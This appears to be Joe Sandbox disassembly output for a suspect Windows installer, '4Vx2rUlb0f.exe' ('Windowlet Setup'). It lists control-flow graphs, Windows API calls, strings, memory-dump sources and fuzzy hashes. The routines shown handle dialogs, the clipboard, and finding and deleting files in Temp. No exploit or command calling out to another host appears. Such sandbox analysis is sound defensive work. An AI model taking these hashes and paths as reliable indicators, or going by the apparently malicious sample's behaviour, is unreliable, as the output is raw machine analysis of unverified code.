                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405491
                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 0040536A
                                                                                                                                  • Part of subcall function 00404149: SendMessageW.USER32(00000028,?,00000001,00403F75), ref: 00404157
                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004054AE
                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005282,00000000), ref: 004054BC
                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 004054C3
                                                                                                                                • ShowWindow.USER32(00000000), ref: 004054E7
                                                                                                                                • ShowWindow.USER32(0001048E,00000008), ref: 004054EC
                                                                                                                                • ShowWindow.USER32(00000008), ref: 00405536
                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556A
                                                                                                                                • CreatePopupMenu.USER32 ref: 0040557B
                                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040558F
                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004055AF
                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055C8
                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405600
                                                                                                                                • OpenClipboard.USER32(00000000), ref: 00405610
                                                                                                                                • EmptyClipboard.USER32 ref: 00405616
                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405622
                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0040562C
                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405640
                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405660
                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 0040566B
                                                                                                                                • CloseClipboard.USER32 ref: 00405671
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                • String ID: {
                                                                                                                                • API String ID: 590372296-366298937
                                                                                                                                • Opcode ID: 37368ef33480fb737561e727008f589c68c636835f40b94f7f78e68fc6a36340
                                                                                                                                • Instruction ID: 691c8e7aa241a152ccc1fa1da29986a8db7386483fecbbc97dabe6f77f48909a
                                                                                                                                • Opcode Fuzzy Hash: 37368ef33480fb737561e727008f589c68c636835f40b94f7f78e68fc6a36340
                                                                                                                                • Instruction Fuzzy Hash: D4B14971800608BFDB119FA0DD89EAE7B79FB48355F00803AFA41BA1A0CB755E51DF68

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 428 406072-40607d 429 406090-4060a6 428->429 430 40607f-40608e 428->430 431 4060ac-4060b9 429->431 432 4062be-4062c4 429->432 430->429 431->432 435 4060bf-4060c6 431->435 433 4062ca-4062d5 432->433 434 4060cb-4060d8 432->434 436 4062e0-4062e1 433->436 437 4062d7-4062db call 406050 433->437 434->433 438 4060de-4060ea 434->438 435->432 437->436 440 4060f0-40612c 438->440 441 4062ab 438->441 442 406132-40613d GetVersion 440->442 443 40624c-406250 440->443 444 4062b9-4062bc 441->444 445 4062ad-4062b7 441->445 448 406157 442->448 449 40613f-406143 442->449 446 406252-406256 443->446 447 406285-406289 443->447 444->432 445->432 451 406266-406273 call 406050 446->451 452 406258-406264 call 405f97 446->452 454 406298-4062a9 lstrlenW 447->454 455 40628b-406293 call 406072 447->455 453 40615e-406165 448->453 449->448 450 406145-406149 449->450 450->448 456 40614b-40614f 450->456 466 406278-406281 451->466 452->466 458 406167-406169 453->458 459 40616a-40616c 453->459 454->432 455->454 456->448 462 406151-406155 456->462 458->459 464 4061a8-4061ab 459->464 465 40616e-40618b call 405f1d 459->465 462->453 469 4061bb-4061be 464->469 470 4061ad-4061b9 GetSystemDirectoryW 464->470 473 406190-406194 465->473 466->454 468 406283 466->468 474 406244-40624a call 4062e4 468->474 471 4061c0-4061ce GetWindowsDirectoryW 469->471 472 406229-40622b 469->472 475 40622d-406231 470->475 471->472 472->475 476 4061d0-4061da 472->476 477 406233-406237 473->477 478 40619a-4061a3 call 406072 473->478 474->454 475->474 475->477 480 4061f4-40620a SHGetSpecialFolderLocation 476->480 481 4061dc-4061df 476->481 477->474 483 406239-40623f lstrcatW 477->483 478->475 486 406225 480->486 487 40620c-406223 SHGetPathFromIDListW CoTaskMemFree 480->487 481->480 485 4061e1-4061e8 481->485 483->474 489 4061f0-4061f2 485->489 486->472 487->475 487->486 489->475 489->480
                                                                                                                                APIs
                                                                                                                                • GetVersion.KERNEL32(00000000,Completed,?,004051E6,Completed,00000000,00000000,0041C400), ref: 00406135
                                                                                                                                • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004061B3
                                                                                                                                • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 004061C6
                                                                                                                                • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406202
                                                                                                                                • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00406210
                                                                                                                                • CoTaskMemFree.OLE32(?), ref: 0040621B
                                                                                                                                • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040623F
                                                                                                                                • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004051E6,Completed,00000000,00000000,0041C400), ref: 00406299
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                • API String ID: 900638850-905382516
                                                                                                                                • Opcode ID: 77a03850bddf5695e6b0b32a6855accced49c5eafe9b7dc377c0e735c0fbd350
                                                                                                                                • Instruction ID: 6a0e75f8176bdfaa808a817e977aa907b1c5d4b6119349843486ba00336cef2a
                                                                                                                                • Opcode Fuzzy Hash: 77a03850bddf5695e6b0b32a6855accced49c5eafe9b7dc377c0e735c0fbd350
                                                                                                                                • Instruction Fuzzy Hash: 45611E71A00105ABDF20AF65CC41AEE37A5EF45314F12817FE852BA2D0D73D8AA1CB4D

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 490 405841-405867 call 405b0c 493 405880-405887 490->493 494 405869-40587b DeleteFileW 490->494 496 405889-40588b 493->496 497 40589a-4058aa call 406050 493->497 495 4059fd-405a01 494->495 498 405891-405894 496->498 499 4059ab-4059b0 496->499 505 4058b9-4058ba call 405a50 497->505 506 4058ac-4058b7 lstrcatW 497->506 498->497 498->499 499->495 501 4059b2-4059b5 499->501 503 4059b7-4059bd 501->503 504 4059bf-4059c7 call 406393 501->504 503->495 504->495 514 4059c9-4059dd call 405a04 call 4057f9 504->514 507 4058bf-4058c3 505->507 506->507 510 4058c5-4058cd 507->510 511 4058cf-4058d5 lstrcatW 507->511 510->511 513 4058da-4058f6 lstrlenW FindFirstFileW 510->513 511->513 515 4059a0-4059a4 513->515 516 4058fc-405904 513->516 530 4059f5-4059f8 call 4051af 514->530 531 4059df-4059e2 514->531 515->499 518 4059a6 515->518 519 405924-405938 call 406050 516->519 520 405906-40590e 516->520 518->499 532 40593a-405942 519->532 533 40594f-40595a call 4057f9 519->533 522 405910-405918 520->522 523 405983-405993 FindNextFileW 520->523 522->519 526 40591a-405922 522->526 523->516 529 405999-40599a FindClose 523->529 526->519 526->523 529->515 530->495 531->503 536 4059e4-4059f3 call 4051af call 405ef1 531->536 532->523 537 405944-40594d call 405841 532->537 542 40597b-40597e call 4051af 533->542 543 40595c-40595f 533->543 536->495 537->523 542->523 546 405961-405971 call 4051af call 405ef1 543->546 547 405973-405979 543->547 546->523 547->523
                                                                                                                                APIs
                                                                                                                                • DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040586A
                                                                                                                                • lstrcatW.KERNEL32(0042F250,\*.*,0042F250,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B2
                                                                                                                                • lstrcatW.KERNEL32(?,0040A014,?,0042F250,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058D5
                                                                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058DB
                                                                                                                                • FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058EB
                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040598B
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0040599A
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040584E
                                                                                                                                • \*.*, xrefs: 004058AC
                                                                                                                                • "C:\Users\user\Desktop\4Vx2rUlb0f.exe", xrefs: 00405841
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                • String ID: "C:\Users\user\Desktop\4Vx2rUlb0f.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                • API String ID: 2035342205-3499683673
                                                                                                                                • Opcode ID: 310f22d1e18abc7c3bbe2dee3bc3119d14cc0d79031cc9c47b9afefb4b25f888
                                                                                                                                • Instruction ID: caf420165dc21d0a99f0983ed575dd8be70d76c6b9b5ff92ec706b465e099e4b
                                                                                                                                • Opcode Fuzzy Hash: 310f22d1e18abc7c3bbe2dee3bc3119d14cc0d79031cc9c47b9afefb4b25f888
                                                                                                                                • Instruction Fuzzy Hash: DB41B171800A14EADB21AB65CD49BBF7678EF85764F10423BF801B11D1D77C4A82DE6E
                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNELBASE(74DF3420,00430298,0042FA50,00405B55,0042FA50,0042FA50,00000000,0042FA50,0042FA50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 0040639E
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004063AA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                • Opcode ID: 395586dc4edb235965e2a282b5d7432a8e50c5a064bd8b1b9b8a05e290e3bc0b
                                                                                                                                • Instruction ID: 351587cf9ce3a522800e1c73501a9738d9f8821b35168cd3fdb078f4a7df3edc
                                                                                                                                • Opcode Fuzzy Hash: 395586dc4edb235965e2a282b5d7432a8e50c5a064bd8b1b9b8a05e290e3bc0b
                                                                                                                                • Instruction Fuzzy Hash: C2D012315081209BC34157787E0C84B7B5C9F1A3317259F36F96AF12E1CB348C2286DC
                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFindFirst
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1974802433-0
                                                                                                                                • Opcode ID: a81ee3202ab0ebdc7edd9b8add70fe35bba4a5d97339da7cd4a9b36177af59e9
                                                                                                                                • Instruction ID: 34d4ac1ca0ba7345d9811ef03afe410f99a72e11e7e6ea98f315d3ade0c6d005
                                                                                                                                • Opcode Fuzzy Hash: a81ee3202ab0ebdc7edd9b8add70fe35bba4a5d97339da7cd4a9b36177af59e9
                                                                                                                                • Instruction Fuzzy Hash: 32F08C71A012149BDB01EBA4DE49AAEB378FF45324F20457BE105F21E1E7B89A409B29

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 184 403c3c-403c4e 185 403c54-403c5a 184->185 186 403d8f-403d9e 184->186 185->186 187 403c60-403c69 185->187 188 403da0-403de8 GetDlgItem * 2 call 404114 SetClassLongW call 40140b 186->188 189 403ded-403e02 186->189 193 403c6b-403c78 SetWindowPos 187->193 194 403c7e-403c81 187->194 188->189 191 403e42-403e47 call 404160 189->191 192 403e04-403e07 189->192 206 403e4c-403e67 191->206 198 403e09-403e14 call 401389 192->198 199 403e3a-403e3c 192->199 193->194 195 403c83-403c95 ShowWindow 194->195 196 403c9b-403ca1 194->196 195->196 201 403ca3-403cb8 DestroyWindow 196->201 202 403cbd-403cc0 196->202 198->199 219 403e16-403e35 SendMessageW 198->219 199->191 205 4040e1 199->205 208 4040be-4040c4 201->208 210 403cc2-403cce SetWindowLongW 202->210 211 403cd3-403cd9 202->211 207 4040e3-4040ea 205->207 213 403e70-403e76 206->213 214 403e69-403e6b call 40140b 206->214 208->205 220 4040c6-4040cc 208->220 210->207 217 403d7c-403d8a call 40417b 211->217 218 403cdf-403cf0 GetDlgItem 211->218 215 403e7c-403e87 213->215 216 40409f-4040b8 DestroyWindow EndDialog 213->216 214->213 215->216 222 403e8d-403eda call 406072 call 404114 * 3 GetDlgItem 215->222 216->208 217->207 223 403cf2-403d09 SendMessageW IsWindowEnabled 218->223 224 403d0f-403d12 218->224 219->207 220->205 226 4040ce-4040d7 ShowWindow 220->226 254 403ee4-403f20 ShowWindow KiUserCallbackDispatcher call 404136 EnableWindow 222->254 255 403edc-403ee1 222->255 223->205 223->224 228 403d14-403d15 224->228 229 403d17-403d1a 224->229 226->205 232 403d45-403d4a call 4040ed 228->232 233 403d28-403d2d 229->233 234 403d1c-403d22 229->234 232->217 237 403d63-403d76 SendMessageW 233->237 239 403d2f-403d35 233->239 234->237 238 403d24-403d26 234->238 237->217 238->232 242 403d37-403d3d call 40140b 239->242 243 403d4c-403d55 call 40140b 239->243 250 403d43 242->250 243->217 252 403d57-403d61 243->252 250->232 252->250 258 403f22-403f23 254->258 259 403f25 254->259 255->254 260 403f27-403f55 GetSystemMenu EnableMenuItem SendMessageW 258->260 259->260 261 403f57-403f68 SendMessageW 260->261 262 403f6a 260->262 263 403f70-403fae call 404149 call 406050 lstrlenW call 406072 SetWindowTextW call 401389 261->263 262->263 263->206 272 403fb4-403fb6 263->272 272->206 273 403fbc-403fc0 272->273 274 403fc2-403fc8 273->274 275 403fdf-403ff3 DestroyWindow 273->275 274->205 276 403fce-403fd4 274->276 275->208 277 403ff9-404026 CreateDialogParamW 275->277 276->206 278 403fda 276->278 277->208 279 40402c-404083 call 404114 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 277->279 278->205 279->205 284 404085-404098 ShowWindow call 404160 279->284 286 40409d 284->286 286->208
                                                                                                                                APIs
                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C78
                                                                                                                                • ShowWindow.USER32(?), ref: 00403C95
                                                                                                                                • DestroyWindow.USER32 ref: 00403CA9
                                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CC5
                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00403CE6
                                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFA
                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403D01
                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403DAF
                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403DB9
                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD3
                                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E24
                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403ECA
                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00403EEB
                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EFD
                                                                                                                                • EnableWindow.USER32(?,?), ref: 00403F18
                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F2E
                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 00403F35
                                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F4D
                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F60
                                                                                                                                • lstrlenW.KERNEL32(0042D248,?,0042D248,Windowlet Setup), ref: 00403F89
                                                                                                                                • SetWindowTextW.USER32(?,0042D248), ref: 00403F9D
                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 004040D1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                • String ID: Windowlet Setup
                                                                                                                                • API String ID: 3282139019-4145104488
                                                                                                                                • Opcode ID: 4b72a46082cfccb0225a7e19ce14cf06edf6b5bf773da4775a24074ada9f3e72
                                                                                                                                • Instruction ID: 977002fee4e807fcea2a4689fe207fdbad8331f3a024ab3ce592dbd86d7f0908
                                                                                                                                • Opcode Fuzzy Hash: 4b72a46082cfccb0225a7e19ce14cf06edf6b5bf773da4775a24074ada9f3e72
                                                                                                                                • Instruction Fuzzy Hash: 2EC1D171504204BFDB216F61EE89E2B3A69FB88706F04053EF641B21F0CB799991DB6D

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 287 403899-4038b1 call 40642a 290 4038b3-4038c3 call 405f97 287->290 291 4038c5-4038fc call 405f1d 287->291 300 40391f-403948 call 403b6f call 405b0c 290->300 296 403914-40391a lstrcatW 291->296 297 4038fe-40390f call 405f1d 291->297 296->300 297->296 305 4039da-4039e2 call 405b0c 300->305 306 40394e-403953 300->306 312 4039f0-403a15 LoadImageW 305->312 313 4039e4-4039eb call 406072 305->313 306->305 308 403959-403981 call 405f1d 306->308 308->305 314 403983-403987 308->314 316 403a96-403a9e call 40140b 312->316 317 403a17-403a47 RegisterClassW 312->317 313->312 318 403999-4039a5 lstrlenW 314->318 319 403989-403996 call 405a31 314->319 330 403aa0-403aa3 316->330 331 403aa8-403ab3 call 403b6f 316->331 320 403b65 317->320 321 403a4d-403a91 SystemParametersInfoW CreateWindowExW 317->321 325 4039a7-4039b5 lstrcmpiW 318->325 326 4039cd-4039d5 call 405a04 call 406050 318->326 319->318 324 403b67-403b6e 320->324 321->316 325->326 329 4039b7-4039c1 GetFileAttributesW 325->329 326->305 333 4039c3-4039c5 329->333 334 4039c7-4039c8 call 405a50 329->334 330->324 340 403ab9-403ad3 ShowWindow call 4063ba 331->340 341 403b3c-403b3d call 405282 331->341 333->326 333->334 334->326 346 403ad5-403ada call 4063ba 340->346 347 403adf-403af1 GetClassInfoW 340->347 345 403b42-403b44 341->345 348 403b46-403b4c 345->348 349 403b5e-403b60 call 40140b 345->349 346->347 352 403af3-403b03 GetClassInfoW RegisterClassW 347->352 353 403b09-403b2c DialogBoxParamW call 40140b 347->353 348->330 354 403b52-403b59 call 40140b 348->354 349->320 352->353 358 403b31-403b3a call 4037e9 353->358 354->330 358->324
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 0040642A: GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
                                                                                                                                  • Part of subcall function 0040642A: GetProcAddress.KERNEL32(00000000,?), ref: 00406457
                                                                                                                                • lstrcatW.KERNEL32(1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00000000), ref: 0040391A
                                                                                                                                • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\neoimpressionism,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,74DF3420), ref: 0040399A
                                                                                                                                • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\neoimpressionism,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 004039AD
                                                                                                                                • GetFileAttributesW.KERNEL32(: Completed), ref: 004039B8
                                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\neoimpressionism), ref: 00403A01
                                                                                                                                  • Part of subcall function 00405F97: wsprintfW.USER32 ref: 00405FA4
                                                                                                                                • RegisterClassW.USER32(00433E80), ref: 00403A3E
                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A56
                                                                                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A8B
                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403AC1
                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403AED
